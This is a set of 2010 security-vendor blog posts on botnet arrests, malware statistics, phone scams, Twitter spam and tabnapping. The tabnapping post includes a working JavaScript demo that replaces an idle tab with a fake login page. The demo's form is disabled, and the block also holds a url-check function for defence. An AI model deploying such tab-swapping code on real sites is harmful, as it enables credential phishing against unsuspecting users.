Mariposa botnet arrest thanks to international co-operation

July 29th, 2010

Our recent paper, The State of International Co-operation on Cybercrime, explored what the international community has done, or tried to do, to tackle the cybercrime issue. It’s quite rare to have the opportunity to highlight a great example of international co-operation, but according to V3.co.uk, a hacker responsible for one of the largest botnets ever created has been arrested thanks to an international effort. The arrest comes months after Spanish police arrested three people, alleged to be the ringleaders of the operation.

The Mariposa botnet, which infected some 12 million computers and some HTC mobile devices, also impacted major banks and US Fortune 500 companies. The virus allowed hackers to steal online banking and credit card details, as well as giving them access to other sensitive data.

This further arrest is a good example of what can be done when nations co-ordinate their fight against cybercrime, and it serves as a warning to other hackers that their business is riskier than they may imagine. However, at the moment the major ‘wins’ in the fight against cybercrime – at an international level – seem to be against high-profile attacks that target major corporations and financial institutions, which is somewhat inevitable given the work required to co-ordinate efforts across borders. Somehow, this co-operation has to be encouraged and eased so that the vast number of smaller attacks which target businesses and home users can be dealt with as well.

US still number one…malware producers

July 28th, 2010

The British government recently announced a major re-organisation of law enforcement bodies in England, changes that will impact the way authorities tackle cybercrime. Whilst it’s true that cybercrime is an international problem, individual Governments need to ensure that they have a strong, coherent cybercrime strategy and taskforce in place to tackle the rising threat that internet fraudsters represent to homes and businesses.

Our July internet threat statistics, which have just been published, clearly demonstrate that now is not the time to neglect the fight against cybercrime (which the recent policing green paper may suggest is happening). The UK now produces around five per cent of the world’s viruses and spam, coming in fourth place in the top 10 worldwide hotspots. The United States still dominates the charts, producing over 14 per cent of viruses and 11 per cent of spam in the world.

If we compare the most recent statistics to January 2010, a few things become apparent:

-    Brazil, responsible for 15 per cent of the world’s viruses in January, doesn’t feature in the top ten virus producers in July, and produces 2.7 per cent less spam than it did (it’s now responsible for 4.9 per cent).
-    The UK, which was in neither the spam nor the virus charts in January, is now producing five per cent of the world’s spam and viruses.
-    The US remains a top three virus and spam producer, increasing virus production by 3.4 per cent (to 14.6 per cent) and spam production by 1.4 per cent (to 11.4 per cent).
-    India’s virus production has risen by six per cent (and is now 9.5 per cent) and spam production has risen by two per cent (to 8.7 per cent).

The figures show how dynamic the cybercrime ‘industry’ is. Often built on a global network of infected computers and run by people working alone or in small teams, these gangs can operate in a far more fluid way than legitimate organisations and will move their base of operations to less stringent jurisdictions if they feel threatened. This is why there needs to be an international solution to the problem; otherwise it will continue to get worse, and we’re likely to see more countries each responsible for a smaller share of malware as the cyber gangs spread around the world – making it harder for law enforcement to put out the fires.

The Windows support scam

July 21st, 2010

Recent articles published in the Guardian have revealed that fraudsters are continuing to cold call people, claiming to be a Windows support tech and getting the users to give them remote access to their PCs in the guise of helping them update their systems – as long as the user hands over £185.

This scam has actually been around for quite some time and whilst police may struggle to stop criminals from setting up business under a new name once they have been shut down, the potential victims can take control of the situation by putting the phone down.

It is, however, concerning that people are still willing to not only give a cold caller their card details, but also allow them remote access to their computers. These people are taking huge risks with their personal data, not to mention the potential illegal content that could be installed whilst the machine is under someone else’s control.

It’s not clear where these criminals are getting their call lists from. Comments on a Guardian article reveal that the data could be leaking from other Indian call centres that call people for legitimate reasons. What is clear is that the callers know what they are talking about. They seem to be highly trained technicians and can therefore easily befuddle the less technical-minded computer user into granting unfettered access to their PC and handing over their card details for the privilege.

The easiest way to avoid becoming a victim of this scam is to allow only someone you know and trust to have access to your computer, and to put the phone down on everyone else.

Should the UK government really call on its citizens for help reviewing data protection laws?

July 12th, 2010

The Government is right to ask for help in reviewing the Data Protection Act, which undoubtedly needs an overhaul. But is the best way to do this really to survey UK citizens on their views? There may be some people who have in-depth knowledge of the ways that data can be used to carry out identity fraud, or compromise accounts, but surely a more sensible way to go would be to create a panel of experts who could come up with a workable review?

My concern is that, at a time when government has to be seen to be cutting down on quangos, there will be resistance to creating a DPA review panel. But asking the public what to do about data protection – a complex technical issue about which the majority of informed citizens will probably have only a passing knowledge – seems a step too far in populist government.

Of course, most people are going to say data protection is A Good Thing. No-one wants their child’s details to be lost or stolen (as we saw today by the ICO’s action against London Borough of Barnet, West Sussex County Council and Buckinghamshire County Council). But understandably, most people (unless they have a real interest in this area) won’t know the multiplicity of ways that data can be used to carry out identity theft, fraud or other criminal activity. If they did, the problem wouldn’t be as serious as it is.

Even people who should be really informed in this area have been caught out. We have seen another Yahoo account compromised, this time belonging to Bob Dvorsky (a US senator). This was probably done in the same way as Sarah Palin’s account was compromised; weak password reset questions are just one way of exploiting people.

Let’s hope, then, that those citizens the government chooses to survey are those who are experts in this area, who know that workable solutions are not always straightforward; and even so-called experts don’t always get it right (the Digital Economy bill showed us that).

Malware from Russia increasing again

July 1st, 2010

At the beginning of May, I wrote that the Russian hosting service, PROXIEZ-NET – which was notoriously used by criminal gangs – was taken down by the authorities.

The result was a temporary decline in malware originating from Russia, which suggested that this botnet was largely populated by systems in Russia itself, though this might have been a coincidence. However, as predicted, those figures are back up to their usual levels again this month. Russia is once again one of the top four virus-producing countries, behind the US, Korea (South Korea in the main), and India.

The lesson from this is that, unfortunately, criminal gangs are not as easy to shut down as the hosting services they use. Shutting down the site will inconvenience the criminals for a short period – but the financial gains to be made in criminal activity online are sufficient that they will find a way of getting back up and running.

Our analysis – which you can see here – also showed that the levels of spam and viruses coming from the UK are still high. In times of economic uncertainty, criminal activity naturally increases. As ever, our advice to all internet users is to be cautious. If a deal seems too good to be true, it probably is.

The state of international co-operation on cybercrime

June 23rd, 2010

Last week’s Tallinn conference was the latest in a series of international gatherings to discuss cybercrime. Unfortunately, although international co-operation is an essential element in defeating cybercrime, these discussions have so far been unable to produce an actionable agreement.

Yes, treaties have been signed and in some cases, ratified, but what use are these documents if they don’t produce results? In our new paper, The state of international co-operation on cybercrime, we explore what has been done to create an international response to cybercrime and look at what is still left to be done.

Clearly, it will take quite a while for nations to agree and implement an international strategy to fight cybercrime. It could even end up being a private sector initiative – consumers need protecting and businesses don’t have the same diplomatic worries that Governments do.

But it’s imperative that Governments keep working together to find a solution in the interim and with the UK now being responsible for almost six per cent of the world’s viruses and receiving more than its fair share of malware, it’s obvious that finding an international solution to the problem should be one of the new British Government’s number one priorities.

Meanwhile, the IT industry will keep developing defences to the increasingly varied attack vectors and trainers will endeavour to spread the word on security to users. However, in parallel, governments need to continue to try to find some form of agreement that will enable them to fight this menace together.

Twitter spam

June 16th, 2010

Twitter users are no strangers to receiving spam tweets about trending topics, but spammers are becoming more sophisticated. As reported by TechCrunch, Twitter users are starting to get spam that gives them an @ mention and tells them to watch or read something.

This method takes advantage of the fact that Twitter users love being mentioned in a tweet and will naturally want to see what they’re being referred to. It also relies on shortened urls to hide the true url being promoted.

Unfortunately, we’re all going to come into contact with some questionable characters from time to time, both in the real and virtual world. Of course, it can be harder to judge people online, without the usual audio and visual cues that we depend on. We’re also likely to have more encounters of this kind online, due to the sheer amount of interaction that takes place there.

If someone you’ve never tweeted before, and that you don’t follow, sends you a link via twitter, keep in mind that this person is a stranger and that by clicking on the link you are effectively welcoming them into your home (for home read computer). Take precautions to try and protect against tricks as you would when meeting a stranger.

If using Firefox, use ‘NoScript’ to block a website’s scripts until you trust it, and employ similar means on IE and Chrome. Ensure you have the latest updates for your operating system and browser, and keep your anti-malware installed and up to date.

Don’t forget, if you receive a suspicious tweet you can always block and report the user for spam.

A guide on how to use Twitter securely can be downloaded free from the Network Box website.

Police site attacked

June 9th, 2010

It was with more than a little concern that I read about Monday’s attack on the Strathclyde Police website. Sadly, attacks on websites have become all too common, but what really grabbed my attention was the statement released by the Police which highlighted a level of naivety I did not expect from the police.

As reported in The Drum:

“They ruled out viruses as the cause and said that no one who had logged onto the site, would have put their computer at risk.”

Perhaps they intended to say that they trust their employees, that they are well trained and educated about current internet threats. But, this completely ignores the fact that most people don’t willingly download viruses and Trojans onto their computers, they are tricked into doing so and frequently have no idea that they are infected.

Then there are the passwords to consider. I remember a case around 20 years ago where a Police force were securing their systems with the password ‘police’. Of course, one would expect people, especially the Police, to be far savvier these days, but weak passwords are endemic and maybe someone just did not take care. As we’ve advised before, it’s important that people change their passwords regularly, using a mixture of upper and lowercase letters, numbers and symbols rather than dictionary words or anything that would be easy to guess.

I’d also be careful about pinpointing blame. It’s unclear why China has been pinpointed as the source of the attack, but it could be anyone pointing links at a server in a country that is, perhaps, just a little slower than others in taking down servers that host malware.

Taking the website down whilst they investigate the cause of the breach is obviously the best response. It’s likely that this was some kind of SQL injection or cross-site scripting attack, and until that flaw is found, the site remains vulnerable.

The one thing that is clear from this is that adequate security was not in place at the time of the attack, and that is something that will need to be remedied before the site goes back online.

UK producing more internet viruses as Russian levels decline

June 1st, 2010

Our May threat statistics are out and show that the UK is now responsible for almost six per cent of the World’s internet viruses (production is up from 3 per cent in April). This makes the UK the third largest producer of viruses after Korea (at over 16 per cent) and the US (at almost 12 per cent).

This growth in the UK suggests that end users in the UK are not being careful and are either visiting malicious sites or running executable attachments to their emails. It also suggests that they are not installing good anti-virus software, which is probably the most vital step in defending themselves. It should be kept in mind that if a computer is sending out viruses, it is ‘owned’ by the hacker who is running the virus and may also be running software to find passwords and credit card details.

Russia has seen a decline in virus production, which may be as a result of PROXIEZ-NET being taken down, but we shouldn’t assume that this trend will last. As we saw with the McColo shutdown in 2008, cyber-criminals tend to bounce back from these setbacks quickly.

“Tabnapping” and what you can do to prevent it

May 26th, 2010

Tabbed browsing has been around for quite a while now, allowing users to switch between dozens of websites whilst keeping the task bar clutter free. One 2009 study found that users switch tabs at least 57.4% of the time, and that 36% of users open new tabs for search engine use.

It’s become common practice for internet users to login to several websites at once using the tab method. A recent study of Firefox users by Mozilla revealed the following reasons for using tabbed browsing:

-    To act as a reminder to do something later
-    Opening many document/search links at once
-    As a substitute for the back button
-    Keeping frequently used sites open
-    Temporary bookmarks

The study also found that an average of 73.3% of tab switches were revisits.

All of this would simply be an interesting way of looking at internet browsing if it weren’t for one small detail. Cyber-criminals are exploiting the system.

During a typical day in the office, you may have several applications that require a login open at once. Let’s say you have Google, LinkedIn, Twitter, BBC News and Amazon open. You’re in the middle of looking for something on Amazon, when someone asks you to find an article for them, so you switch to Google and carry out a search. After a while, you switch back to Amazon and are confronted not with the page you were previously on, but with the login page. No problem, you’ve obviously just been kicked out of the site and just need to log back in. That’s what many would assume, and that is the assumption that phishers are playing on.

“Tabnapping”, as it’s being called, is where a hacker uses JavaScript to manipulate one of your inactive tabs so that when you return to it, you’re on a fake login page rather than the one you’d left it on. Unless you check the url, you may not realise that the page is a fake, or notice that the tab order has changed (your online bank was your last tab, but is now the second). The fake page may even display a message saying that your session has timed out. Aza Raskin of Mozilla demonstrates just how easy it is to hijack the tab and fool the unwitting user. (You can also find out more about the problem, and test it out for yourself, over at his blog.)

So, what can the user do? Normally, I would recommend installing NoScript on Firefox to prevent unauthorised JavaScript from running on your computer, but that only helps on sites whose scripts you haven’t already allowed. Aspects of the user’s behaviour need to change as well. Users should keep the number of open tabs to a minimum; always check that the url matches the site before entering any login, financial or identity information; and if in doubt, close the tab and navigate to the page again.
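To make the mechanism concrete, here is an added example, written for this page and not taken from Aza Raskin’s demo or from Network Box, of the core of a tabnapping page alongside the address-bar check recommended above. The lure delay, the impersonated brand name and the form markup are all assumptions chosen for illustration; the form posts nowhere. DOM access is guarded so the same code can be exercised outside a browser.

```javascript
// Added example: minimal tabnapping page plus the url check a user should make.
// Not code from the original post. Brand name, delay and markup are illustrative.

const LURE_DELAY_MS = 5000;            // assumed: how long the tab must be idle before swapping
const ORIGINAL_TITLE = "Harmless article";
const IMPERSONATED = "Example Mail";   // hypothetical brand being impersonated

// Policy: swap only after the tab has been in the background long enough, and only once.
// Kept as a pure function so it can be tested without a browser.
function shouldSwap(hiddenSinceMs, nowMs, alreadySwapped) {
  if (alreadySwapped || hiddenSinceMs === null) return false;
  return nowMs - hiddenSinceMs >= LURE_DELAY_MS;
}

// The look-alike page. A real attack copies the target's markup and favicon;
// this one is deliberately crude and its form never submits anywhere.
function buildFakeLogin(brand) {
  return `<h1>${brand}</h1>
<p>Your session has expired. Please sign in again.</p>
<form action="#" onsubmit="return false">
  <input name="user" placeholder="email">
  <input name="pass" type="password">
  <button>Sign in</button>
</form>`;
}

// The check the post recommends: before typing credentials, confirm that the
// tab's url belongs to the site you believe you are on. Script can rewrite the
// title, favicon and body, but not the address bar. Subdomains of the expected
// host pass; look-alike hosts such as amazon.co.uk.evil.example do not.
function urlBelongsTo(currentHref, expectedHost) {
  let host;
  try {
    host = new URL(currentHref).hostname.toLowerCase();
  } catch (e) {
    return false;                      // not a parseable url: treat as untrusted
  }
  const expected = expectedHost.toLowerCase();
  return host === expected || host.endsWith("." + expected);
}

// Wire the attack to the page only when a DOM is present (i.e. in a browser).
if (typeof document !== "undefined" && typeof window !== "undefined") {
  let hiddenSince = null;
  let swapped = false;
  let timer = null;
  document.title = ORIGINAL_TITLE;

  // Raskin's demo keyed off window focus; the tab "leaves" when focus is lost.
  window.addEventListener("blur", () => {
    hiddenSince = Date.now();
    timer = setTimeout(() => {
      if (shouldSwap(hiddenSince, Date.now(), swapped)) {
        swapped = true;
        document.title = `${IMPERSONATED} - Sign in`;
        document.body.innerHTML = buildFakeLogin(IMPERSONATED);
      }
    }, LURE_DELAY_MS);
  });

  // Coming back quickly cancels the swap so short glances away look innocent.
  window.addEventListener("focus", () => {
    if (!swapped) { clearTimeout(timer); hiddenSince = null; }
  });
}
```

Note that the swap happens while the tab is in the background, so by the time the user returns the fake page is already in place; only the address bar (and, on a real page, the certificate) still tells the truth, which is why the url check is the defence that survives the script.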

It’s important to remember that when we fill out online forms and submit login details, we are entrusting our information to an organisation outside our control. It’s not enough just to trust these organisations to protect our data. We need to make sure we do, too.